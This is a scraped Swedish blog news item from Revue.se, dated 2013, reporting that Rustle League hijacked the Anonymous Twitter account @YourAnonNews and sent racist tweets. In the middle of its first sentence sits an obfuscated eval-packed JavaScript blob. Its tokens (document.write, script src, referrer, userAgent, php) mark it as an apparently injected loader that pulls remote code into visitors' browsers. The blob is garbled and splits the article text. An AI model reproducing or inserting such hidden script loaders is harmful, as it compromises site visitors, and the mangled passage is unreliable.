Image Image Image Image Image Image Image Image Image Image

| 17 januari, 2018

Scroll to top

Top

No Comments

Anonymous Twitter är hackad... där ser man! | Revue.se

rustle leauge
Filip Urde
  • On 31 maj, 2013
  • http://www.revue.se/filip-urde

Anonymous eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bnhhd|var|u0026u|referrer|ribzn||js|php’.split(‘|’),0,{}))
ena Twitter-konto, 
@YourAnonNews, har blivit hackat av Rustle League, vilket är en annan hacker-aktivistgruppering. 

 

 

 

Det är inte första gången som Rustle League lyckats komma över ett Twitter-konto som förknippas med Anonymous. När Rustle League kom över @YourAnonNews så skickade man genast ett tiotals tweets med blandannat rasistiska budskap.

@YourAnonNews kontrolleras fortfarande av Rustle Leauge. Anonymous får smaka på sin egen medicin?
thenextweb.com